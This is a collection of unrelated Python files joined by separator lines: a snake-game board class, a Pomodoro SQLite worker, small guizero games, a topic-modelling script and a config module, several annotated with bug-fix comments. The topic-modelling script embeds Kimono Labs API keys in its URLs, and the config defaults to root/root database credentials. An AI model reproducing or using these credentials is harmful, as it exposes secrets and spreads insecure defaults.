
    def get_valid_neighbor_right(self, snake_id, x, y, distance=1):
        return self._checked_neighbor(snake_id, (x + 1, y), distance)

    def get_largest_snakes(self, snake_ids):
        """Return the subset of *snake_ids* whose length equals the maximum.

        Bug fix: the original ``else`` branch appended every snake that was
        not strictly longer than the running maximum, so *shorter* snakes
        were also collected. Only ties for the maximum belong in the result.
        """
        max_length = 0
        long_snakes = []
        for snake_id in snake_ids:
            length = self.snakes[snake_id]["length"]
            if length > max_length:
                max_length = length
                long_snakes = [snake_id]
            elif length == max_length:
                long_snakes.append(snake_id)
        return long_snakes

    def simulation_copy(self):
        """Deep-ish copy for lookahead simulation (squares copied via their
        own simulation_copy)."""
        copy = type(self)()
        copy.width = self.width
        copy.height = self.height
        copy.food = deepcopy(self.food)
        copy.snakes = deepcopy(self.snakes)
        copy.squares = [[sq.simulation_copy() for sq in column]
                        for column in self.squares]
        return copy

    def get_distance_to_closest_owned_food(self, snake_id):
        """Distance to the nearest food this snake can claim, or None.

        Food is "owned" when this snake is uniquely closest, or when it is
        among the closest and is the single largest of them.
        """
        closest_food_distance = None
        for food in self.food:
            x = food["x"]
            y = food["y"]
            closest_snakes = self.squares[x][y].get_closest_snake()
            if snake_id in closest_snakes:
                # Bug fix: get_largest_snakes returns a list, so the original
                # comparison `... == snake_id` (list vs. str) was always False;
                # compare against the one-element list instead.
                if len(closest_snakes) == 1 or self.get_largest_snakes(closest_snakes) == [snake_id]:
                    distance = self.squares[x][y].get_snake_distance(snake_id)
                    if closest_food_distance is None or distance < closest_food_distance:
                        closest_food_distance = distance
        return closest_food_distance

    def calculate_snakes_distances(self, snakes_to_decrement=None):
        """BFS from each snake's head, recording per-square distances.

        *snakes_to_decrement* lists snake ids whose starting distance is
        reduced by one, simulating that they already moved last turn.
        (Mutable-default bug fix: the original used ``=[]``.)
        """
        if snakes_to_decrement is None:
            snakes_to_decrement = []
        neighbor_getters = (self.get_valid_neighbor_up,
                            self.get_valid_neighbor_down,
                            self.get_valid_neighbor_left,
                            self.get_valid_neighbor_right)
        for snake in self.snakes.values():
            snake_id = snake["id"]
            bfs_queue = queue.SimpleQueue()
            starting_x = snake["head"]["x"]
            starting_y = snake["head"]["y"]
            starting_distance = 0 if snake_id in snakes_to_decrement else 1
            # TODO touches every square at least twice when backtracking
            # Seed the queue with the head's valid neighbors.
            for get_neighbor in neighbor_getters:
                x, y = get_neighbor(snake_id, starting_x, starting_y, starting_distance)
                if x is not None:
                    bfs_queue.put({"x": x, "y": y, "depth": 1})
            # Standard BFS: first visit to a square fixes its distance.
            while not bfs_queue.empty():
                item = bfs_queue.get()
                current_square = self.squares[item["x"]][item["y"]]
                if current_square.get_snake_distance(snake_id) is None:
                    current_square.set_snake_distance(snake_id, item["depth"])
                    next_depth = item["depth"] + 1
                    for get_neighbor in neighbor_getters:
                        x, y = get_neighbor(snake_id, item["x"], item["y"], next_depth)
                        if x is not None:
                            bfs_queue.put({"x": x, "y": y, "depth": next_depth})
|
#!/usr/bin/env python2.6
# -*- coding: utf-8 -*-
# db.py
# Pomodoro
#
# Created by Roman Rader on 20.08.11.
# New BSD License 2011 Antigluk https://github.com/antigluk/Pomodoro
"""
Data base controller.
"""
from singleton import Singleton
from options import PomodoroOptions, ConfigError
from pomodoro_entity import PomodoroEntity
from sqlite3 import dbapi2 as sqlite
import time
import os
import threading
from NotificationCenter.NotificationCenter import NotificationCenter
from Queue import Empty as QueueEmpty
from Queue import Queue
import logging
# NOTE(review): the returned logger is discarded -- presumably this was meant
# to be assigned (e.g. `logger = logging.getLogger('Pomodoro')`) or to
# configure the named logger; confirm the intent.
logging.getLogger('Pomodoro')
# Producer of tasks
class DataBaseController(object):
    """
    Controller for DB. Generator of tasks (DBTask) for DataBaseThread
    (producer-consumer pattern), which process it from shared Queue.
    """
    __metaclass__ = Singleton

    # Seconds to wait when enqueueing a task before giving up.
    DBREQUEST_TIMEOUT = 5

    def __init__(self):
        self.queue = Queue()
        self.dbThread = DataBaseThread(self.queue)
        self.dbThread.start()
        NotificationCenter().addObserver(self, self.willQuit, "beforeQuit")

    def _submit(self, task):
        """Enqueue *task*, block until the worker finished it, return its result."""
        self.queue.put(task, True, self.DBREQUEST_TIMEOUT)
        self.queue.join()
        return task.result

    def willQuit(self, obj):
        """'beforeQuit' observer: drain the queue, then stop the worker thread."""
        logging.debug("Waiting for finishing all operations with DB...")
        self.queue.join()
        logging.warn("Terminating DB thread...")
        self.dbThread.terminate()

    def newPomodoro(self, description):
        """Persist a finished pomodoro stamped with the current time."""
        curtime = str(int(time.time()))
        result = self._submit(DBTask(DBTask.DBTASK_ADD, {"time": curtime,
                                                         "desc": description}))
        NotificationCenter().postNotification("dbUpdated", self)
        return result

    def getAllPomodoros(self):
        """Return every stored pomodoro."""
        return self._submit(DBTask(DBTask.DBTASK_GET_ALL))

    def getPomodoro(self, number):
        """Return the pomodoro at position *number* (most recent first)."""
        return self._submit(DBTask(DBTask.DBTASK_GET_ONE, {"number": number}))

    def pomodoroCount(self):
        """Return the total number of stored pomodoros."""
        return self._submit(DBTask(DBTask.DBTASK_GET_COUNT))

    def makeDB(self, fileName):
        """Create a fresh database file at *fileName*."""
        return self._submit(DBTask(DBTask.DBTASK_MAKEDB, {"file": fileName}))
# Task for DB
class DBTask(object):
    """Unit of work handed to DataBaseThread.

    The worker reads ``action`` and ``data``, stores its output in
    ``result`` and finally invokes ``callback`` (if any) with the task.
    """

    # Action codes understood by the worker thread.
    DBTASK_NOTASK = 0
    DBTASK_ADD = 1
    DBTASK_MAKEDB = 2
    DBTASK_GET_ALL = 3
    DBTASK_GET_COUNT = 4
    DBTASK_GET_ONE = 5

    def __init__(self, act, parameters=None, callback=None):
        self.action = act
        self.data = parameters
        self.result = None
        self.callback = callback

    def sendCallback(self):
        """Invoke the completion callback with this task, if one was supplied."""
        if self.callback is None:
            return
        self.callback(self)
# Consumer, handler
class DataBaseThread(threading.Thread):
    """
    Thread that handles requests to DB.
    Contains connection object to SQLite.
    Consumer in producer-consumer pattern.
    """

    # Seconds to block waiting for a task before re-checking the
    # termination flag (replaces the original get_nowait() busy-wait).
    QUEUE_POLL_TIMEOUT = 0.1

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.conn = None
        opts = PomodoroOptions()
        self.dbpath = opts.getDBPath(makedbMethod = self.makeNewDB)
        logging.debug('Using db file: %s' % self.dbpath)
        if self.dbpath is None:
            raise ConfigError('No db file')
        if not os.path.isfile(self.dbpath):
            self.makeNewDB(self.dbpath)
        opts.dbpath = self.dbpath
        self.__terminated = False

    def run(self):
        """Main loop: pop tasks from the queue and dispatch until terminated."""
        self.connectToDB(self.dbpath)
        while not self.__terminated:
            try:
                # Fix: block with a short timeout instead of spinning on
                # get_nowait(), which burned CPU while the queue was empty.
                task = self.queue.get(True, self.QUEUE_POLL_TIMEOUT)
            except QueueEmpty:
                continue
            ret = None
            if task.action == DBTask.DBTASK_ADD:
                ret = self.newPomodoro(task.data["time"], task.data["desc"])
                logging.debug("New pomodoro written: %s, %s" % ret)
            elif task.action == DBTask.DBTASK_MAKEDB:
                ret = self.makeNewDB(task.data["file"])
            elif task.action == DBTask.DBTASK_GET_ALL:
                ret = self.allPomodoros()
            elif task.action == DBTask.DBTASK_GET_ONE:
                ret = self.getPomodoro(task.data["number"])
            elif task.action == DBTask.DBTASK_GET_COUNT:
                ret = self.pomodoroCount()
            task.result = ret
            self.queue.task_done()
            task.sendCallback()
        logging.debug("Data Base Thread terminated")

    def connectToDB(self, fname):
        """Open the SQLite connection and announce it via the notification center."""
        self.conn = sqlite.connect(fname)
        self.dbpath = fname
        NotificationCenter().postNotification("dbConnected", self)

    def terminate(self):
        """Ask the run() loop to exit after the current task."""
        self.__terminated = True

    # Tasks
    def newPomodoro(self, time, description):
        """Insert a finished pomodoro; returns (time, description)."""
        if self.conn is None:
            # Fix: original called the bare name `connectToDB` (NameError);
            # it is a method and must be called on self.
            self.connectToDB(self.dbpath)
        cur = self.conn.cursor()
        cur.execute("insert into pomodoros values (?, ?, NULL)", (time, description))
        self.conn.commit()
        cur.close()
        return (time, description)

    def makeNewDB(self, fname):
        """Create a new database file with the pomodoros table; True on success."""
        try:
            conn = sqlite.connect(fname)
            cur = conn.cursor()
            cur.execute('CREATE TABLE pomodoros (finish_time integer, description text, key integer primary key)')
            conn.commit()
            cur.close()
            logging.info("DB Created")
            return True
        # Fix: original said `except sqlite3.Error, e` -- the module is
        # imported as `sqlite` (so `sqlite3` was an undefined name) and the
        # comma syntax is Python-2-only; `as` works on 2.6+ and 3.
        except sqlite.Error:
            logging.error("Error while creating db at %s" % fname)
            return False

    def allPomodoros(self):
        """Return every stored pomodoro as a tuple of PomodoroEntity, oldest first."""
        logging.info("Getting pomodoros..")
        if self.conn is None:
            self.connectToDB(self.dbpath)  # fix: was bare `connectToDB(...)`
        cur = self.conn.cursor()
        cur.execute("SELECT * FROM pomodoros ORDER BY finish_time ASC")
        ret = []
        for row in cur:
            ret.append(PomodoroEntity(int(row[0]), row[1], row[2]))
        self.conn.commit()
        cur.close()
        logging.debug("Returned %d records" % (len(ret)))
        return tuple(ret)

    def pomodoroCount(self):
        """Return the number of stored pomodoros."""
        if self.conn is None:
            self.connectToDB(self.dbpath)  # fix: was bare `connectToDB(...)`
        cur = self.conn.cursor()
        cur.execute("SELECT Count(*) FROM pomodoros")
        (count,) = cur.fetchone()
        cur.close()
        return int(count)

    def getPomodoro(self, item):
        """Return the pomodoro at offset *item*, newest first."""
        if self.conn is None:
            self.connectToDB(self.dbpath)  # fix: was bare `connectToDB(...)`
        cur = self.conn.cursor()
        cur.execute("SELECT * FROM pomodoros ORDER BY finish_time DESC LIMIT ?, 1", [str(item)])
        row = cur.fetchone()
        ret = PomodoroEntity(int(row[0]), row[1], row[2])
        cur.close()
        return ret
|
import pandas as pd
'''
df=pd.DataFrame([["jack",24],["rose",18]],columns=["name","age"])
df.to_csv("person.csv")
'''
# NOTE(review): this URL is the GitHub HTML page for the file, not the raw
# CSV (raw.githubusercontent.com/...) -- pd.read_csv will parse page markup,
# not the dataset. Confirm the intended source.
url="https://github.com/venky14/Machine-Learning-with-Iris-Dataset/blob/master/Iris.csv"
# Column names assigned to the parsed frame.
columns=["Id","SepalLengthCm"]
# delimiter="\n" makes each whole line a single field; presumably a
# workaround for the non-CSV content above -- verify against the real file.
df=pd.read_csv(url,delimiter="\n",names=columns)#index_col=["Id"])
print(df.head(2))
|
# Imports ---------------
from guizero import App, Text, Waffle, Window , PushButton, TextBox, Picture, Box
from random import randint
import random
# ------------------------------
# Variables Flood IT
# ------------------------------
# Palette of colours used for both the board and the picker.
colours = ["red", "blue", "green", "yellow", "magenta", "purple"]
# The Flood-It board is board_size x board_size squares.
board_size = 14
# Maximum number of flood moves available to the player.
moves_limit = 25
# Running count of moves made this game (mutated by win_check).
moves_taken = 0
# ------------------------------
# Functions Flood IT
# ------------------------------
# Recursively floods adjacent squares
def flood(x, y, target, replacement):
    """Recursively repaint the connected region of *target*-coloured squares
    reachable from (x, y) with *replacement*.

    Algorithm from https://en.wikipedia.org/wiki/Flood_fill
    """
    if target == replacement:
        return False
    if board.get_pixel(x, y) != target:
        return False
    board.set_pixel(x, y, replacement)
    # Recurse into each in-bounds 4-neighbour (S, N, E, W).
    for next_x, next_y in ((x, y + 1), (x, y - 1), (x + 1, y), (x - 1, y)):
        if 0 <= next_x <= board_size - 1 and 0 <= next_y <= board_size - 1:
            flood(next_x, next_y, target, replacement)
# Check whether all squares are the same
# Check whether all squares are the same
def all_squares_are_the_same():
    """Return True when every square on the board shows the same colour."""
    squares = board.get_all()
    # all() already yields a bool -- the original's explicit
    # `if ...: return True / else: return False` was redundant.
    return all(colour == squares[0] for colour in squares)
def win_check():
    """Called after every flood move: count the move and report the outcome.

    Bug fix: the original displayed "You lost :(" after *every* non-winning
    move while moves remained (and showed nothing once the limit was
    exceeded). Now a win is reported within the move budget, and the loss
    message appears only once the budget is used up.
    """
    global moves_taken
    moves_taken += 1
    if moves_taken <= moves_limit and all_squares_are_the_same():
        win_text.value = "You win!"
    elif moves_taken >= moves_limit:
        win_text.value = "You lost :("
def fill_board():
    """Give every board square a random colour from the palette."""
    for col in range(board_size):
        for row in range(board_size):
            board.set_pixel(col, row, random.choice(colours))
def init_palette():
    """Paint one swatch per colour onto the palette waffle.

    Uses enumerate instead of the original colours.index(colour) lookup,
    which rescanned the list on every iteration.
    """
    for position, colour in enumerate(colours):
        palette.set_pixel(position, 0, colour)
def start_flood(x, y):
    """Palette click handler: flood from the top-left corner with the
    clicked swatch's colour, then check for a win/loss."""
    chosen_colour = palette.get_pixel(x, y)
    current_colour = board.get_pixel(0, 0)
    flood(0, 0, current_colour, chosen_colour)
    win_check()
# Variables Destroy The Dots-------------
# Side length of the Destroy-The-Dots board.
GRID_SIZE = 5
# Player score (incremented by destroy_dot, read by add_dot).
score = 0
# NOTE(review): presumably a typo of "Guardado" (saved score) --
# GuardarPartida1 assigns a *local* "Guardado" instead of this global;
# confirm the intent.
Guadado=0
contador=0
# Functions Destroy The Dots-------------
def add_dot():
    """Place a red dot on a random empty square, then reschedule itself.

    The respawn interval shrinks as the score climbs; the game is lost
    when every square has turned red.
    """
    x, y = randint(0, GRID_SIZE - 1), randint(0, GRID_SIZE - 1)
    # Keep rolling until we land on a square without a dot.
    while board1[x, y].dotty == True:
        x, y = randint(0, GRID_SIZE - 1), randint(0, GRID_SIZE - 1)
    board1[x, y].dotty = True
    board1.set_pixel(x, y, "red")
    # Difficulty tiers: higher score -> faster dots.
    if score > 30:
        speed = 200
    elif score > 20:
        speed = 400
    elif score > 10:
        speed = 500
    elif score == -1:
        speed = 0
    else:
        speed = 1000
    all_red = all(board1[col, row].color == "red"
                  for col in range(GRID_SIZE)
                  for row in range(GRID_SIZE))
    if all_red:
        score_display.value = "You lost! Score: " + str(score)
    else:
        board1.after(speed, add_dot)
def destroy_dot(x, y):
    """Board click handler: clear the dot at (x, y) and award a point."""
    global score
    if board1[x, y].dotty != True:
        return  # nothing to destroy on an empty square
    board1[x, y].dotty = False
    board1.set_pixel(x, y, "white")
    score += 1
    score_display.value = "Your score is " + str(score)
def stop_dot():
    """Freeze the dots game by painting the board red (add_dot stops rescheduling)."""
    board1.set_all("red")
    # NOTE(review): sets .dotty on the waffle itself, not on the individual
    # squares -- confirm whether per-square flags should be cleared instead.
    board1.dotty=False
def Continuar_Juego1():
    """Resume the dots game: reset the board, restart spawning, switch windows."""
    board1.set_all("white")
    board1.dotty=False
    add_dot()
    score_display.value = "Your score is " + str(score)
    window_comprobar.hide()
    window_game1.show()
def GuardarPartida1():
    """'Save game' handler: reset the board and return to the chooser window."""
    # NOTE(review): this assigns a *local* name and has no lasting effect --
    # presumably the global (spelled "Guadado" at module level) was intended.
    Guardado=score
    board1.set_all("white")
    board1.dotty=False
    boxdoble.visible=True
    Reanudar=PushButton(boxdoble,text="Reanudar última partida",grid=[0,0],command=Continuar_Juego1)
    Icono=Text(boxdoble,text="▶",size=40,color="green",grid=[1,0])
    window_game1.hide()
    window_comprobar.hide()
    window_choice.show()
# Button handler functions
def mostrar_puntaje():
    # Show the scores window.
    window_puntaje.show()
def comprobacion():
    # Stop the dots game, then ask for confirmation.
    stop_dot()
    window_comprobar.show()
def comprobacion2():
    # Confirmation dialog for the Flood-It game.
    window_comprobar2.show()
def mostrar_login():
    window_login.show()
def mostrar_choice():
    # Leave the login screen for the game chooser.
    window_login.hide()
    window_choice.show()
def mostrar_registro():
    # Leave the login screen for the registration form.
    window_login.hide()
    window_registro.show()
def iniciar_juego1():
    # Start spawning dots shortly after the button press, then hide the button.
    board1.after(100,add_dot)
    Iniciar.hide()
def mostrar_juego1():
    window_game1.show()
def mostrar_juego2():
    window_game2.show()
def cerrar_Splash():
    # Hide the splash screen window.
    app.hide()
# App ------------------- splash screen shown at startup
app = App(bg="Purple",height="700",width="800")
box2=Box(app,width="fill",height="300")
box=Box(app,width="fill",height="fill")
Bienvenida_label=Text(box,text="¡BIENVENIDO!",size=80,color="white",font="Comic Sans MS")
cargando_label=Text(box,text="Loading.....",size=30)
# After 1.5 s, move from the splash screen to the login window.
App.after(app,1500,mostrar_login)
# Windows ------------------------------------------ all created up-front and hidden
window_puntaje = Window(app, bg="medium violet red", title="Puntajes")
window_puntaje.hide()
window_game1 = Window(app, bg="#788199", title="Destroy The dots")
window_game1.hide()
window_game2 = Window(app, bg="#788199", title="Flood It")
window_game2.hide()
window_login = Window(app,bg="medium violet red",title="Pantalla de Login")
window_login.hide()
window_choice = Window(app, bg="bisque", title="Seleccione un Juego")
window_choice.hide()
window_registro= Window(app,bg="bisque", title="Registro")
window_registro.hide()
window_comprobar= Window(app,bg="#666666",title="Dialogbox",height=200,width=350)
window_comprobar.hide()
window_comprobar2= Window(app,bg="#666666",title="Dialogbox",height=200,width=350)
window_comprobar2.hide()
window_administrador=Window(app,bg="#788199",title="Modo Administrador")
window_administrador.hide()
# Destroy The Dots -- widgets for game 1
titulo=Text(window_game1,text="🅳🅴🆂🆃🆁🅾🆈 🆃🅷🅴 🅳🅾🆃🆂",size=30)
instructions = Text(window_game1, text="Click the dots to destroy them")
board1 = Waffle(window_game1, width=GRID_SIZE, height=GRID_SIZE, command=destroy_dot)
score_display = Text(window_game1, text="Your score is " + str(score))
box=Box(window_game1,width="fill",height="20")
Iniciar=PushButton(window_game1,text="Iniciar Juego",command=iniciar_juego1)
box=Box(window_game1,width="fill",height="20")
Detener=PushButton(window_game1,text="Finalizar Juego",command=comprobacion)
# Flood IT -- widgets for game 2
titulo=Text(window_game2,text="🅵🅻🅾🅾🅳 🅸🆃",size=30)
board = Waffle(window_game2, width=board_size, height=board_size, pad=0)
palette = Waffle(window_game2, width=6, height=1, dotty=True, command=start_flood)
win_text = Text(window_game2)
box=Box(window_game2,width="fill",height="20")
Detener=PushButton(window_game2,text="Finalizar Juego",command=comprobacion2)
fill_board()
init_palette()
# Window_login -- username/password form
box=Box(window_login,width="fill",height=200)
text_nombre=Text(window_login,text="Ingrese su nombre de usuario",color="White",size=10)
nombre=TextBox(window_login,text="Nombre usuario",width=30)
box=Box(window_login,width="fill",height=30)
text_nombre=Text(window_login,text="Ingrese su contraseña",color="White",size=10)
contrasena=TextBox(window_login,text="Ingrese su Contraseña",width=30,hide_text=True)
box=Box(window_login,width="fill",height=30)
ingresar_button = PushButton(window_login, text="Ingresar", command=mostrar_choice)
box=Box(window_login,width="fill",height=30)
registrar_button = PushButton(window_login, text="Registrar",command=mostrar_registro)
# Window_choice -- game chooser
box=Box(window_choice,width="fill",height=120)
# Call the database and pass it the score value
if(score==0):
    boxdoble=Box(window_choice,width=190,height=60 ,layout="grid",grid=[0,0],visible=False)
    Reanudar=PushButton(boxdoble,text="Reanudar última partida",grid=[0,0])
    Icono=Text(boxdoble,text="▶",size=40,color="green",grid=[1,0])
else:
    # NOTE(review): score is always 0 at import time, so this branch (which
    # also shows windows immediately) appears unreachable here -- confirm.
    boxdoble=Box(window_choice,width=190,height=60 ,layout="grid",grid=[0,0],visible=True)
    Reanudar=PushButton(boxdoble,text="Reanudar última partida",grid=[0,0],command=Continuar_Juego1)
    Icono=Text(boxdoble,text="▶",size=40,color="green",grid=[1,0])
    window_game1.hide()
    window_comprobar.hide()
    window_choice.show()
box=Box(window_choice,width="fill",height=30)
boxdoble2=Box(window_choice,width=220,height=60 ,layout="grid",grid=[0,0])
Destroy_button = PushButton(boxdoble2, text="𝘿𝙚𝙨𝙩𝙧𝙤𝙮 𝙏𝙝𝙚 𝘿𝙤𝙩𝙨",grid=[1,0], command=mostrar_juego1)
Icono=Text(boxdoble2,text="🔴",size=30,color="red",grid=[0,0])
Icono=Text(boxdoble2,text="🔴",size=30,color="red",grid=[3,0])
box=Box(window_choice,width="fill",height=30)
boxdoble3=Box(window_choice,width=180,height=60 ,layout="grid",grid=[0,0])
Icono=Text(boxdoble3,text="🌊",size=30,color="blue",grid=[0,0])
Flood_button = PushButton(boxdoble3, text="𝙁𝙡𝙤𝙤𝙙 𝙄𝙩", command=mostrar_juego2,grid=[1,0])
Icono=Text(boxdoble3,text="🌊",size=30,color="blue",grid=[3,0])
box=Box(window_choice,width="fill",height=30)
boxdoble2=Box(window_choice,width=180,height=60 ,layout="grid",grid=[0,0])
Destroy_button = PushButton(boxdoble2, text="Puntajes",grid=[1,0], command=mostrar_puntaje)
Icono=Text(boxdoble2,text="🏆",size=30,color="black",grid=[0,0])
Icono=Text(boxdoble2,text="🏆",size=30,color="black",grid=[3,0])
# Window_Registro -- registration form
box1=Box(window_registro,width="fill")
# NOTE(review): `mostrar_login and window_registro.hide` short-circuits to
# window_registro.hide only (mostrar_login is truthy and never called) --
# presumably both actions were intended; confirm.
back=PushButton(box1,text="🢀",align="left",command=mostrar_login and window_registro.hide)
titulo=Text(window_registro,text="'Ingrese los datos solicitados'",color="Black",size=15)
box1=Box(window_registro,width="fill",height=60)
nombreUsuario=TextBox(window_registro,text="Nombre de Usuario",width=50)
box1=Box(window_registro,width="fill",height=20)
contraseña1=TextBox(window_registro,text="Ingrese Contraseña",width=50)
box1=Box(window_registro,width="fill",height=40)
#Aquí guardar los datos del registro en la base de datos--------------------------------------------------------------
Registrarse=PushButton(window_registro,text="Registrarse",command=mostrar_login and window_registro.hide)
#Window_comprobacion
box=Box(window_comprobar,width="fill",height=20)
back=PushButton(box,text="❌",align="right")
texto=Text(window_comprobar,text="¿Seguro quiere finalizar el juego?",size=12,color="white")
box=Box(window_comprobar,width="fill",height=40)
box2=Box(window_comprobar,width="fill",height=120,layout="grid",grid=[1,0])
Espacio=Text(box2,text=" ",grid=[0,0],enabled="false")
Cancelar=PushButton(box2,text="𝘾𝙖𝙣𝙘𝙚𝙡𝙖𝙧",grid=[1,0],command=Continuar_Juego1)
Espacio=Text(box2,text=" ",grid=[2,0],enabled="false")
Aceptar=PushButton(box2,text="𝘼𝙘𝙚𝙥𝙩𝙖𝙧",grid=[3,0], command=GuardarPartida1)
#Window_comprobacion2
box=Box(window_comprobar2,width="fill",height=20)
back=PushButton(box,text="❌",align="right")
texto=Text(window_comprobar2,text="¿Seguro quiere finalizar el juego?",size=12,color="white")
box=Box(window_comprobar2,width="fill",height=40)
box2=Box(window_comprobar2,width="fill",height=120,layout="grid",grid=[1,0])
Espacio=Text(box2,text=" ",grid=[0,0],enabled="false")
#Cancelar=PushButton(box2,text="𝘾𝙖𝙣𝙘𝙚𝙡𝙖𝙧",grid=[1,0],command=Continuar_Juego2)
Espacio=Text(box2,text=" ",grid=[2,0],enabled="false")
#Aceptar=PushButton(box2,text="𝘼𝙘𝙚𝙥𝙩𝙖𝙧",grid=[3,0], command=GuardarPartida2)
app.display()
|
def merge_array(arr1, arr2):
    """Combine two lists and render them as a descending, space-separated string."""
    combined = sorted(arr1 + arr2, reverse=True)
    return ' '.join(str(value) for value in combined)
# Driver: read t test cases from stdin; each case is a (discarded) length
# line followed by two space-separated integer arrays to merge.
t = int(input())
for i in range(t):
    N = input()  # length line, unused — arrays are split directly below
    arr1 = list(map(int, input().split()))
    arr2 = list(map(int, input().split()))
    print(merge_array(arr1, arr2))
|
from menu.interface_menu import InterfaceMenu
class SupportMenu(InterfaceMenu):
    """Menu screen that queues the support message on entry.

    Appends the language-specific SUPPORT_MSG to `self.msgs`
    (both presumably initialized by InterfaceMenu — confirm there);
    message handling is delegated to the parent unchanged.
    """
    def __init__(self, bot, user):
        super().__init__(bot, user)
        self.msgs.append(self.lang.SUPPORT_MSG)
    def handle_message(self, message):
        # Pure delegation; override kept for symmetry with sibling menus.
        return super().handle_message(message)
import json
import urllib
from collections import Counter
from pprint import pprint
import tsne
import plsa
import numpy as np
import sys
#import pylab
import math
# NOTE: Python 2 script (print statements, urllib.urlopen, dict.keys() indexing).
# NOTE(review): hard-coded API key in source — should come from config/env.
kimpath = "http://www.kimonolabs.com/api/8fxfaiu6?apikey=fb110eb5d4c1775fbf3e9840e88f4f3a"
#kimpath = "http://www.kimonolabs.com/api/9d6lg708?apikey=5243944dc6c0c5602dd3f6f0ef19f2cf"
#kimpath = "http://www.kimonolabs.com/api/csy9c4ho?apikey=5243944dc6c0c5602dd3f6f0ef19f2cf"
# Build a URL-encoded query string from the command-line words.
query = sys.argv[1:]
#print query
query = "%20".join(query)
query = query.replace(' ','%20')
print query
param = "&query={}&querydisp={}".format(query,query)
print query,param
print kimpath+param
# Fetch and parse the API response.
webapi = json.load(urllib.urlopen(kimpath+param))
#pprint(webapi["results"]["papers"][0]["title"]["text"])
#pprint(webapi["results"]["papers"][0]["keywordsAndAbstract"])
# Per-document word counts and a corpus-wide total.
weblab = []
total_freq = Counter()
word_freq = {}
nD = len(webapi['results']['papers'])
for i in range(nD):
    webitem = webapi['results']['papers'][i]
    weblab += webapi['results']['papers'][i]['title']['text'],
    webtext = webapi['results']['papers'][i]['keywordsAndAbstract'].split()
    #print webtext
    word_freq[i] = Counter(webtext)
    total_freq.update(webtext)
#print word_freq[1]
#print total_freq
#print weblab
# Assign each distinct word an integer id (Python 2: keys() is a list;
# order is arbitrary but stable while the dict is unmodified).
nW = len(total_freq)
wordID = {}
IDword = {}
for j in range(nW):
    wordID[total_freq.keys()[j]] = j
    IDword[j] = total_freq.keys()[j]
# Document-by-word count matrix.
Ndw = np.zeros((nD,nW))
for i in range(nD):
    for word in word_freq[i]:
        Ndw[i][wordID[word]] = word_freq[i][word]
print Ndw
#pprint(total_freq)
#print Ndw
# PLSA with nZ topics; small noise avoids zero counts in the EM updates.
nZ = 3
noise = +np.random.rand(nD,nW)
Pd_z, Pw_z,Pz_d,Pz_w = plsa.plsa(Ndw+noise,nZ,100)
Y = np.concatenate((Pz_d.T,Pz_w.T))
Y = Y[:,:-1]
#for i in range(len(Y)):
#    Y[i] = Y[i][:2]
#Y = Y[:2]
#print np.shape(Y)
#Y = tsne.tsne(Ndw.T,2,nD)
#Y = tsne.tsne(Y,2,nZ)
#Y = tsne.pca(Ndw.T,nD);
#Y = tsne.pca(Pw_z.T,nZ);
print np.shape(Y)
#print Y
#fig = pylab.figure()
#ax = fig.add_subplot(111)
#print weblab
#pylab.scatter(Y[nD:nD+nW,0], Y[nD:nD+nW,1], 20,color='blue');
#pylab.scatter(Y[0:nD,0]   , Y[0:nD,1]   , 20,color='red');
labels = wordID.keys()
#pylab.show()
# Constants for the (currently disabled) JSON export below.
dict_doc = {}
center_doc = {}
distance = 'distance'
children = 'children'
node_type = 'type'
node_name = 'name'
doc_type = 2
word_type = 1
# for i in range(nD):
# key_doc = webapi['results']['papers'][i]['title']['text']
# if i == 0:
# center_doc[node_name] = key_doc
# center_doc['x'] = Y[0,0]
# center_doc['y'] = Y[0,1]
# center_doc[node_type] = doc_type
# center_doc[children] = []
# for j in range(nW):
# if Ndw[i][j] != 0 :
# keyword_data = {}
# keyword_data['x'] = Y[j+nD,0]
# keyword_data['y'] = Y[j+nD,1]
# xDiff = center_doc['x']-Y[j+nD,0]
# yDiff = center_doc['y']-Y[j+nD,1]
# keyword_data[distance] = math.sqrt(xDiff*xDiff+yDiff*yDiff)
# keyword_data[node_name] = IDword[j]
# keyword_data[node_type] = word_type
# center_doc[children].append(keyword_data)
# else:
# doc_data = {}
# doc_data['x'] = Y[i,0]
# doc_data['y'] = Y[i,1]
# doc_data[node_name] = key_doc
# doc_data[node_type] = doc_type
# doc_data[children] = []
# xDiff = center_doc['x']-Y[i,0]
# yDiff = center_doc['y']-Y[i,1]
# doc_data[distance] = math.sqrt(xDiff*xDiff + yDiff*yDiff)
# for j in range(nW):
# if Ndw[i][j] != 0 :
# keyword_data = {}
# keyword_data['x'] = Y[j+nD,0]
# keyword_data['y'] = Y[j+nD,1]
# xDiff = Y[i,0] - Y[j+nD,0]
# yDiff = Y[i,1] - Y[j+nD,1]
# keyword_data[distance] = math.sqrt(xDiff*xDiff + yDiff*yDiff)
# keyword_data[node_name] = IDword[j]
# keyword_data[node_type] = word_type
# doc_data[children].append(keyword_data)
# center_doc[children].append(doc_data)
# with open('json_all.txt', 'wb') as outfile:
# json.dump(center_doc, outfile,ensure_ascii=False)
# print center_doc
|
import os
import os.path
from codebuilder.utils import util
# Default configuration values; any of these may be overridden by the
# config files loaded below or by the command-line Arguments further down.
CONFIG_DIR = os.environ.get('CONFIG_DIR', '/etc/codebuilder')
CONFIG_FILES = []
LOG_LEVEL = 'debug'
LOG_DIR = '/var/log/codebuilder'
LOG_FILE = None
LOG_INTERVAL = 6
LOG_INTERVAL_UNIT = 'h'  # hours; see the --log-interval_unit choices below
LOG_FORMAT = (
    '%(asctime)s - %(filename)s - %(lineno)d - %(levelname)s - %(message)s')
LOG_BACKUPS = 5
LOG_FILTERS = []
DATABASE_TYPE = 'mysql'
DATABASE_NAME = 'codebuilder'
DATABASE_USER = 'root'
DATABASE_PASSWORD = 'root'
DATABASE_HOST = 'localhost'
DATABASE_PORT = 3306
# Lazily-built connection URI so it reflects whatever the DATABASE_* values
# resolve to at access time, not at import time.
DATABASE_URI = util.LazyObj(
    lambda: '%s://%s:%s@%s:%s/%s' % (
        util.parse(DATABASE_TYPE),
        util.parse(DATABASE_USER),
        util.parse(DATABASE_PASSWORD),
        util.parse(DATABASE_HOST),
        util.parse(DATABASE_PORT),
        util.parse(DATABASE_NAME)
    )
)
DATABASE_POOL_TYPE = 'instant'
# Merge values from on-disk config files into this module's namespace.
# NOTE(review): `iteritems` is Python 2 only — confirm target interpreter.
config = util.load_configs([
    os.path.join(CONFIG_DIR, filename) for filename in CONFIG_FILES
])
CONFIG_VARS = vars()
for key, value in config.iteritems():
    CONFIG_VARS[key] = value
# Wrap each setting in a command-line Argument so it can be overridden
# via flags; the value merged above becomes the flag's default.
